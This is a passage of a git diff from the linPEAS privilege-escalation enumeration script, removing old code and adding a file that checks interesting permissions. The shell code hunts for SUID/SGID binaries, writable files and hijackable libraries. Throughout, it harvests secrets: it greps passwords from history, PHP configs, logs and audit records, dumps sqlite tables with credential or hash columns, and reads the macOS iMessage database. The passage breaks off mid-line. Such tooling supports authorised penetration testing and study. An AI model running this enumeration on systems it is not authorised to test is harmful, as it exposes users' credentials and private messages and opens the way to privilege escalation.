2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" -fi - -##-- IF) Root files in home dirs -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" -fi - -##-- IF) Others files in my dirs -if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" -fi - -##-- IF) Readable files belonging to root and not world readable -if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" -fi - -##-- IF) Modified interesting files into specific folders in the last 5mins -print_2title "Modified interesting files in the last 5mins (limit 100)" -find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," -echo "" - -##-- IF) Writable log files -if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below -print_2title "Writable log files (logrotten) (limit 50)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; - fi - fi - done -fi - -echo "" - -if ! [ "$SEARCH_IN_FOLDER" ]; then - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" - - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" - - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq - echo "" - - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - if [ "$backup_folders" ] || [ "$DEBUG" ]; then - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" - done - echo "" - fi -fi - -##-- IF) Backup files -print_2title "Backup files (limited 100)" -backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) -printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; -done -echo "" - -##-- IF) DB files -if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - -fi - - -if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - else - echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ] || [ "$DEBUG" ]; then - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head - echo "" - fi - done - fi - fi - done -fi -echo "" - -if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" -fi - -##-- IF) Web files -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" -fi - -##-- IF) All hidden files -print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" -find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 -echo "" - -##-- IF) Readable files in /tmp, /var/tmp, bachups -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" -fi - -##-- IF) Interesting writable files by ownership or all -if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - echo "" -fi - -##-- IF) Interesting writable files by group -if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" - for g in $(groups); do - iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - if [ "$iwfbg" ] || [ "$DEBUG" ]; then - printf " Group $GREEN$g:\n$NC"; - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - fi - done - echo "" -fi - -##-- IF) Passwords in history cmd -if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then - print_2title "Searching passwords in history cmd" - history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "" -fi - -##-- IF) Passwords in history files -if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then - print_2title "Searching passwords in history files" - printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done - echo "" -fi - -##-- IF) Passwords in config PHP files -if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then - print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done - echo "" -fi - -##-- IF) Passwords files in home -if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then - print_2title "Searching *password* or *credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found - echo "" -fi - -##-- IF) TTY passwords -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" -fi - -##-- IF) IPs inside logs -if [ "$DEBUG" ]; then - print_2title "Searching IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" -fi - -##-- IF) Passwords inside logs -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Searching passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" -fi - -if [ "$DEBUG" ]; then - ##-- IF) Emails inside logs - print_2title "Searching emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" - echo "" -fi - - - - -if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Searching passwords inside key folders (limit 70) - only PHP files" - if ! [ "$SEARCH_IN_FOLDER" ]; then - intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) - else - intpwdfiles=$(timeout 150 find $SEARCH_IN_FOLDER -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) - fi - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Searching passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - ##-- IF) Find possible files with passwords - print_2title "Searching possible password variables inside key folders (limit 140)" - if ! [ "$SEARCH_IN_FOLDER" ]; then - timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & - timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & - else - timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & - fi - wait - echo "" - - ##-- IF) Find possible conf files with passwords - print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" - if ! [ "$SEARCH_IN_FOLDER" ]; then - ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - else - ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - fi - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" -fi diff --git a/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh b/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh new file mode 100644 index 0000000..8180486 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh @@ -0,0 +1,491 @@ +########################################### +#-) Files with Interesting Permissions (-# +########################################### + +check_critial_root_path(){ + folder_path="$1" + if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi +} + + + + +##-- IPF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ]; then + + if [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi + fi + done + fi + + if [ "$LDD" ] || [ "$READELF" ]; then + echo "$ITALIC --- Checking for writable dependencies of $sname...$NC" + fi + if [ "$LDD" ]; then + "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + if [ "$READELF" ]; then + "$READELF" -d "$sname" | grep PATH | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + + if [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" + fi + + fi + fi + fi + fi +done; +echo "" + + +##-- IPF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" +sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ]; then + + if [ 